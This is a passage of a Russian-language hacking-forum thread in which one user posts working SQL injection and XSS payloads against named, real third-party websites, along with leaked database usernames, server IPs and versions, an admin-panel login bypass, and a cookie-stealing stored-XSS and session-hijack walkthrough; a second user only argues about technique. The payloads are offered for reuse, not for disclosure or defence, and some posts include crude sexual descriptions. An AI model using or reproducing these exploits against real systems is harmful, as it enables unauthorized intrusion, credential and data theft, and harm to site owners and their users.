HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #261  
Старый 15.05.2017, 01:10
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

SQLi Error base внедрение двойным запросом.

Код:
Code:
http://www.hairboutique.com/glossary/Detail.php?Keyword=Dimethicone Copolyol Meadowfoamate' and (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) and '1'='1
root@HB-85|file_priv Y|5.5.19|Win64x86|
 
Ответить с цитированием

  #262  
Старый 15.05.2017, 16:00
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

Сайт: russikona.ruТИЦ 160

SQLi Error base

russikon_db@localhost|file_priv N|5.5.52-cll-lve|Linux|MySQL Community Server (GPL)|x86_64|

Код:
Code:
http://www.russikona.ru/news.php?id=198' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='admin' limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+
XSS-reflected:

Код:
Code:
http://www.russikona.ru/news.php?id=198%27%3e%3cbody+onload%3dalert(document.cookie)%3e
Надеюсь ничьих чувств не оскорбил
 
Ответить с цитированием

  #263  
Старый 17.05.2017, 00:02
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

Сайт: rakuraku-home.jp

SQLi Error base через POST

queserser_1301@10.1.0.111|5.0.27-standard-log|unknown-linux-gnu|x86_64|MySQL Community Edition - Standard (GPL)|

Уязвимые параметры account и password

В запросе через Repeater нужно отправить в параметр account эксплоит, а в параметр password любой символ, букву или цифру

эксплоит:

Код:
Code:
URL:http://www.rakuraku-home.jp/system/login/login.php
POST:' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) #
вход в админку логин и пароль 1' or '1

Админка:

Код:
Code:
http://www.rakuraku-home.jp/system/
 
Ответить с цитированием

  #264  
Старый 18.05.2017, 16:51
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

Парочка сайтов с финансовой тематикой

Сайт: eltee.de

SQL Injection через GET, уязвимый параметр id, вывод в title

pc-linux-gnu:i686:dbo456679871@212.227.29.56:db456679871:5.1.73

эксплоит:

Код:
Code:
view-source:http://www.eltee.de/education_id.php?id=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version_compile_os,0x3a,@@version_compile_machine,0x3a,user(),0x3a,database(),0x3a,@@version,0x3a,0x3a,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
Сайт: businesstoday.lk

SQL Injection через GET, уязвимый параметр issue

5.5.52-cll:bttoday_bt:bttoday_btadmin@localhost:Linux:i686:/usr

эксплоит:

Код:
Code:
http://www.businesstoday.lk/bnb.php?bnbId=&issue=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version,0x3a,database(),0x3a,user(),0x3a,@@version_compile_os,0x3a,@@version_compile_machine,0x3a,@@basedir,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
 
Ответить с цитированием

  #265  
Старый 19.05.2017, 19:56
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

Шоп с 3d принтерами и всяким оборудованием

Сайт: smtmax.com

SQL Injection через GET, уязвимый параметр act

Linux:x86_64:smtmax8_smtmax@localhost:smtmax8_smtmax:5.6.35:/usr

эксплоит:

Код:
Code:
http://www.smtmax.com/info.php?act=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(%40%40version_compile_os%2c0x3a%2c%40%40version_compile_machine%2c0x3a%2cuser()%2c0x3a%2cdatabase()%2c0x3a%2c%40%40version%2c0x3a%2c%40%40basedir%2c0x3a%2cFLOOR(RAND(0)*2))a+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+a)b)%2b%27
Сайт адалт тематики: straightpornstuds.com

Примерные данные за день

Посетителей: 1469

Просмотров: 5878

Boolean Based SQL Injection

5.0.96 log:str5lt3m 2@107.180.121.24:str5lt3m1 2

Если появился видео ролик от BRAZERS с брюнеткой в очках с толстой жопой и силиконовыми буферами значит "true"

Если перекинуло на ролик от DDFnetwork где бландинку долбят в рот в четыре ствола это "false"

эксплоит:

Код:
Code:
http://straightpornstuds.com/80341%20OR%20(select%20ascii(substr(database(),1,1))=115).html
P.s. когда true страничка может долго подгружаться.
 
Ответить с цитированием

  #266  
Старый 20.05.2017, 20:23
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

Щоп с компьютерными аксессуарами

Сайт: groupgear.co.uk

MS SQL Injection через POST

уязвимый параметр inputsearch

microsoft sql server 2012 (sp1) - 11.0.3156.0 (x64) may 4 2015 18:48:09 copyright (c) microsoft corporation web edition (64-bit) on windows nt 6.2 <x64> (build 9200: ) (hypervisor)|

computergear2012|computerSQL2014

эксплоит:

Код:
Code:
URL:http://www.groupgear.co.uk/searchResults.asp
POST:'AND 1=cast(@@VERSION as varchar(8000)) or '1'='
 
Ответить с цитированием

  #267  
Старый 21.05.2017, 23:26
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

Сайт: magiclantern.org.uk

Boolean Based SQL Injection черз GET, уязвимый параметр id

5.5.54-38 7-log:umag_249477_0001 linweb7.atlas.pipex.net:magiclanternorguk_249477_db1

Если есть пост с заголовком The Temple of Minerva "true"

Если нет поста с заголовком The Temple of Minerva "false"

Эксплоит:

Код:
Code:
http://www.magiclantern.org.uk/sales/publications.php?id=13 OR (select ascii(substr(@@VERSION,1,1))=53)
Stored XSS:

Уязвимые параметры: Contact_Name;Email_address;Email_address2;Subject

Открываем URL в Firefox и в одном из уязвимых полей или во всех вставляем payload, жмем Submit, наш код сохранился на сервере

Код:
Code:
URL:http://www.magiclantern.org.uk/contact.php
payload: ">
Теперь нужно сохранить Cookie PHPSESSID(из Firefox) в блокнот

Вычистим куки из Firefox и пройдем снова по нашему URL ни чего не работает (( закрываем Firefox и открываем другой браузер,

например хром, устанавливаем туда любой кукименежжер, открываем любую страницу нашего сайта например главную magiclantern.org.uk

в куки менеджере меняем Cookie PHPSESSID(из Хром) на Cookie PHPSESSID(из Firefox) переходим на вкладку Contact Us видим выполнение нашего скрипта в хроме.
 
Ответить с цитированием

  #268  
Старый 22.05.2017, 01:39
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

НУ я так и знал. А вам слабо самому что-то найти и сделать? Вы попробуйте, я уверен вы сможете. Я просто не понимаю, я конечно не профи, но я невкуриваю, зачем крутить как слепую когда есть вывод. А вообще, скажи мне , что это а инструмент такой?

Там ещё мод сек, только что он делает я не понял

 
Ответить с цитированием

  #269  
Старый 22.05.2017, 05:40
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

НУ я так и знал.
Код:
Code:
http://www.magiclantern.org.uk/sales/publications.php?id=-1 union all select 1,2,USER(),@@version,database(),@@basedir,@@version_compile_os,@@version_compile_machine,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 --+
Так лучше ? ))
 
Ответить с цитированием

  #270  
Старый 22.05.2017, 16:37
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Нет, не лучше. Ты каким софтом крутишь?
burpsuite, SQLmap, Netsparker
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ